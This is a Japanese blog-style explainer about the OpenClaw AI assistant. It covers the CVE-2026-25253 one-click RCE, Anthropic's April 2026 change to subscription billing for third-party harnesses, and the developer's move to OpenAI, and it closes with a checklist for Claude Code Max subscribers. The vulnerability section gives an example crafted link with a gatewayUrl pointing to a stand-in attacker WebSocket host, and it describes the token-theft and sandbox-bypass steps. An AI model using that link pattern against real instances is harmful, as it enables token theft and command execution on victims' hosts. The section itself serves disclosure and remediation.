Claude Code Max ($200/月) を使ってる人は、4月4日以降に契約条件が変わった話を必ず押さえてほしい。OpenClaw騒動はサブスク経済・セキュリティ・OSSガバナンスの3つの境界線が一気に動いた事件で、対応を放置するとお金とリスクの両方で損をする。
ここ3ヶ月、OpenClawという個人開発のAIアシスタントツールが「Claude Code互換ハーネス」として爆発的に伸びて、GitHub Starsで一時 React を抜いた。その裏でCVE-2026-25253(CVSS 8.8)のRCE脆弱性、開発者のOpenAI移籍、Anthropicの突然の課金ルール変更が連続して起きた。
この記事は 「全体像が頭に入ってない人が3分で追いつく」ための一次情報まとめ + Claude Code Max契約者が今すぐやることチェックリスト。
この記事でわかること
- OpenClawとは何で、なぜ3ヶ月で React を超えるGitHub Starsを獲得したのか
- CVE-2026-25253(1-click RCE)の脆弱性パターンと、自分が影響を受けるかの判別方法
- Anthropicが4月4日に変更した「サブスク経済の境界線」の構造分析
- Steinberger氏のOpenAI移籍と「closed harness vs OSS」のガバナンス論点
- Claude Code Max契約者の対応アクション5つ
対象読者
- Claude Code Pro / Max を使ってる、または検討中の日本のエンジニア
- 「OpenClaw って名前は聞くけど実態がわからない」人
- AI開発ツールのサブスク料金体系に関心がある人
- AIエージェント周りのセキュリティリスクを把握したい人
目次
- 前提: OpenClawとは何か
- 3イベント時系列マップ
- ① CVE-2026-25253 — 1-click RCEの仕組み
- ② 4月4日のAnthropic方針変更 — サブスク経済の境界線
- ③ Steinberger氏OpenAI移籍とOSSガバナンス
- Claude Code Max契約者がやること5つ
- まとめ
前提: OpenClawとは何か
このセクションで「OpenClawの正体」と「なぜここまで伸びたか」を1分で押さえる。
OpenClawはAustriaの開発者 Peter Steinberger が2025年11月に「Clawdbot」として公開した、ローカル実行型のAIアシスタントフレームワーク。後に OpenClaw に改名された。
特徴は3つ。
| 特徴 | 中身 |
|---|---|
| ローカル実行 | 自分のmacOS / iOS / Androidデバイス上でエージェントが動く |
| データオーナーシップ | 自分のデータが自分のハードに残る(クラウドに送らない) |
| API料金ゼロ可能 | ローカルモデル接続なら推論コストが発生しない |
そして Claude Code Maxサブスクのトークンを使って OpenClaw経由でClaudeを呼び出せたのが致命的なバズ要因だった。$200/月のサブスクで、APIに換算すると$1,000相当の使い方ができたという報告がHacker Newsに多数上がっていた(HNスレッド)。
GitHub Starsの推移は異常なペースだった。
| 時期 | Stars | イベント |
|---|---|---|
| 2026/02初 | 145,000 | CVE公開直後 |
| 2026/03/03 | 250,000+ | React (243,000) を抜く |
| 最新 | 347,000 | Anthropic方針変更後 |
Stars 14.5万 → 34.7万を3ヶ月で達成 という成長は近年のOSSではかなり珍しい。背景には「Claude Code Maxの実質割引ツール」「ローカル実行による所有権」「OSSによる検証可能性」の3つが重なっていた。
3イベント時系列マップ
このセクションで「いつ何が起きたか」を1枚の図で頭に入れる。
3つのイベントが2ヶ月で連続発生した。それぞれ独立しているように見えて、Steinberger氏の主張を踏まえると 「OpenClawの成功 → Anthropicの危機感 → ロックアウト」 という連鎖として読むこともできる。次のセクションから順番に分解する。
① CVE-2026-25253 — 1-click RCEの仕組み
このセクションで「自分が影響を受けるか」を判別できるようにする。
脆弱性の概要
| 項目 | 値 |
|---|---|
| CVE番号 | CVE-2026-25253 |
| CVSSスコア | 8.8(高) |
| カテゴリ | CWE-669 (Incorrect Resource Transfer Between Spheres) |
| 公開日 | 2026年2月2日 |
| 影響バージョン | v2026.1.29未満 |
| 修正バージョン | v2026.1.29(2026/01/30リリース) |
攻撃のフロー
OpenClawの Control UI がクエリ文字列の gatewayUrl パラメータを 検証なしで信頼 していたのが起点。
1. 攻撃者が悪意あるリンク作成
例: https://victim-host/control?gatewayUrl=wss://attacker.com/
2. 被害者がリンクをクリック
→ Control UIが起動 → gatewayUrl の WebSocket に自動接続
3. 接続時に「ゲートウェイトークン」が攻撃者サーバーに送信される
※ ブラウザはCORSをWebSocketには適用しないため、
クロスオリジン制限がかからない
4. 攻撃者が盗んだトークンで管理スコープを使用
→ サンドボックス無効化 → ホスト上で任意コマンド実行
ポイントは 「WebSocket接続にはブラウザのCORS制限がかからない」 という設計仕様の盲点を突いている点(The Hacker News解説)。HTTPなら防げた攻撃が、WebSocketだから通った。
影響範囲
- 公開日時点で 40,000+ instances がインターネットに露出
- そのうち 63%が脆弱バージョン で稼働中だった
- ミリ秒単位で発動するため、クリックした瞬間に侵害完了
自分が影響を受けるかチェック
OpenClawをインストールしている場合のみ、以下を確認する。
# OpenClawのバージョン確認
openclaw --version
# v2026.1.29未満なら即アップデート
brew upgrade openclaw # macOS
# または公式インストーラから最新版取得
重要: 公開インスタンスを localhost ではなく外部に晒している場合、ファイアウォール側でも遮断する。Control UIをインターネットに直接公開する設計はそもそも非推奨。
この事件の教訓
「ローカル実行AI = 安全」という思い込みは危険、というのが業界の受け止め。ローカル実行であってもブラウザ経由の攻撃面は残る。AIエージェント設計のセキュリティ標準として「WebSocketのOrigin検証」「トークンスコープの最小化」「サンドボックス前提」が再注目された。
② 4月4日のAnthropic方針変更 — サブスク経済の境界線
このセクションで「自分のサブスク料金がどう変わるか」を理解する。
何が変わったか
2026年4月4日12:00 PT(日本時間4月5日午前4時)、Anthropicは以下を発表した(TechCrunch)。
Claude subscriptionsはOpenClaw含むサードパーティ・ハーネスの利用パターンに対応していなかった。今後は、サードパーティ・ハーネスの利用は pay-as-you-goオプション(サブスクとは別建て) での課金とする。
つまり、Claude Code Max ($200/月) のトークン上限を OpenClaw 経由で使うことはできなくなった。OpenClawから Claude を使い続けたければ、サブスクの上にAPI課金を別で積む形になる。
Anthropic側の主張
Claude Code責任者の Boris Cherny は次のように説明。
私たちのサブスクリプションは、これらサードパーティツールの使用パターン向けに設計されたものではない。持続可能な形で長期的に顧客に価値を提供し続けるため、成長を意図的にマネジメントしようとしている。
Steinberger側の反論
OpenClaw作者の Steinberger 氏は OpenClaw board memberの Dave Morin と一緒に Anthropic に交渉した が、価格変更は1週間遅らせるのが精一杯だったとX投稿で公開。
first they copy some popular features into their closed harness, then they lock out open source.
(まず人気機能を自社の閉じたハーネスにコピーし、次にオープンソースを締め出す)
サブスク経済の境界線が動いた
ここで重要なのは、「サブスク料金 vs 実利用コストの構造的乖離」 という普遍的な論点が表面化したこと。
| 観点 | Anthropicの立場 | ヘビーユーザーの立場 |
|---|---|---|
| 価格設計の前提 | 平均ユーザーの利用パターン | 上限まで使い切るのが合理的 |
| サブスク本質 | 利用の予測可能性 | 利用権の購入 |
| 第三者ツール扱い | 想定外の利用パターン | 同じトークンの別UIに過ぎない |
HNの議論でも「ヘビーユーザーが平均ユーザーに 補助されている 構造を守るには制限が必要」という擁護論と、「すでにトークン上限がある以上、追加制限は競合保護」という批判論が拮抗した(HNスレッド 1,099pt / 827コメント)。
緩和措置
Anthropicは批判を受けて以下を提供。
- サブスク額相当のクレジット(1回限り、2026/04/17まで利用可能)
- 最大30% off の追加バンドル
ただし、この緩和措置の存在を知らずにサブスクを更新したユーザーが多かった とHN上で報告されている。該当する人は今すぐ自分のアカウントでクレジットの残数を確認するべき。
③ Steinberger氏OpenAI移籍とOSSガバナンス
このセクションで「OpenClawの今後がどう変わるか」を理解する。
移籍発表の経緯
2026年2月14日、Steinberger氏は自身のブログでOpenAI入社を発表(本人ブログ)。
要点は3つ。
- 動機: 「13年企業経営して、会社を大きくすることに興味はない。世界を変えたい」
- OpenClawの扱い: foundation化、open and independentに保つ。OpenAIはあくまでスポンサー
- OpenAI選定理由: 複数のAI研究機関と面談した結果、ビジョンの一致が決め手
OpenAIスポンサーシップの意味
OpenClawがOpenAIに 買収されたわけではない のがポイント。財団に移管され、OpenAIが資金提供する形。これにより:
- Anthropic製APIにも、OpenAI製APIにも、その他のローカルモデルにも接続可能な状態を維持
- 「OSSハーネスがどこか1社の支配下に置かれない」という業界の懸念に応えた設計
closed harness vs OSS の論点
Steinberger氏が示唆した「closed harness」とは Anthropic の自社製 Claude Code を指す。AIツール業界で 「ベンダー純正の閉じたツール」と「OSSのハーネス」の競争関係 が顕在化した、というのが本騒動の構造的な意義。
| 観点 | Closed harness (Claude Code) | OSS harness (OpenClaw) |
|---|---|---|
| 開発主体 | Anthropic | コミュニティ + foundation |
| 機能更新 | Anthropicの優先度 | コミュニティPR |
| 透明性 | 限定的 | フルOSS、検証可能 |
| 経済モデル | サブスク収益で支える | スポンサー + 個人開発 |
| ロックイン | 高い | 低い(モデル交換可) |
批評視点: Steinberger氏の主張(「Anthropicが機能を真似してからOSSを締め出した」)は本人の立場を踏まえると当然のポジショントーク。一方、Boris Cherny氏の説明(「サブスクの設計外利用」)もAnthropic側の立場として理解できる。どちらかが完全に正しいわけではなく、サブスク経済とOSSエコシステムの利害が構造的にぶつかった事例 と読むのが妥当。
Claude Code Max契約者がやること5つ
ここまでの3イベントを踏まえて、Claude Code Max ($200/月) 契約者が今やることを優先度順にまとめた。
1. クレジット残額の確認(今日中)
サブスク額相当のクレジット(2026/04/17 まで利用可能)を消化したか確認。
1. https://platform.claude.com/ にログイン
2. Settings → Billing → Credits を確認
3. 残額があれば期限内に使い切るプランを立てる
2. OpenClaw利用の有無棚卸し(今週中)
OpenClaw経由でClaude APIを使っていた場合、サブスク内では動かなくなっている。
# OpenClawがインストールされているか確認
which openclaw
ls -la ~/.openclaw 2>/dev/null
# 使っていた場合: pay-as-you-goに切り替えるか、
# Claude Code純正に戻すかを決める
3. CVE-2026-25253対応(OpenClaw利用者のみ)
openclaw --version
# v2026.1.29未満なら即アップデート
# Control UIを外部公開していないか確認
lsof -i -P | grep openclaw
4. サブスク利用パターンの記録(今月中)
サブスク経済の境界線が今後も動く可能性が高い。自分の利用パターンを記録しておく と、次回の規約変更時に判断材料になる。
- 月のトークン消費(API/ハーネス別)
- 主要ユースケース(コーディング/調査/文章生成)
- $200/月に対する実利用コスト相当(API換算)
5. 代替手段の知識アップデート(継続)
「Claude Code純正以外の選択肢」を頭に入れておく。
| ツール | 特徴 | 状態 |
|---|---|---|
| Claude Code (純正) | Anthropic公式 | サブスク内動作◎ |
| Claude Managed Agents | 4月8日公開ベータ | API課金 |
| OpenClaw | OSSハーネス | サブスク外、API課金が必要 |
| Cursor | エディタ統合 | サブスク独自 |
| Cline / Aider | OSSハーネス | API課金 |
まとめ
OpenClaw騒動は単なる脆弱性ニュースでも、価格変更ニュースでも、人材移動ニュースでもなく、「サブスク経済 × セキュリティ × OSSガバナンス」が同時に動いた事例 として整理するのが正しい。
Claude Code Max契約者にとっては「クレジット残額確認」「OpenClawアップデート」「利用パターン記録」の3つが最低限のアクション。
サブスクの境界線は今後も動く。ベンダー純正ツールとOSSハーネスのどちらに賭けるか という判断は、AI開発エンジニアにとって2026年後半の重要な選択ポイントになりそう。
今日からやること
- 今日: Claude Console でクレジット残額確認(5分)
- 今週: OpenClaw利用の有無を棚卸し、CVE対応(15分)
- 今月: 自分のClaude利用パターンを記録、代替手段を比較検討(継続)
参考ソース:
- TechCrunch: Anthropic says Claude Code subscribers will need to pay extra for OpenClaw usage
- Hacker News: Tell HN: Anthropic no longer allowing Claude Code subscriptions to use OpenClaw
- Claude Platform Release Notes (公式)
- The Hacker News: OpenClaw Bug Enables One-Click Remote Code Execution
- Peter Steinberger: OpenClaw, OpenAI and the future
- OpenClaw GitHub repository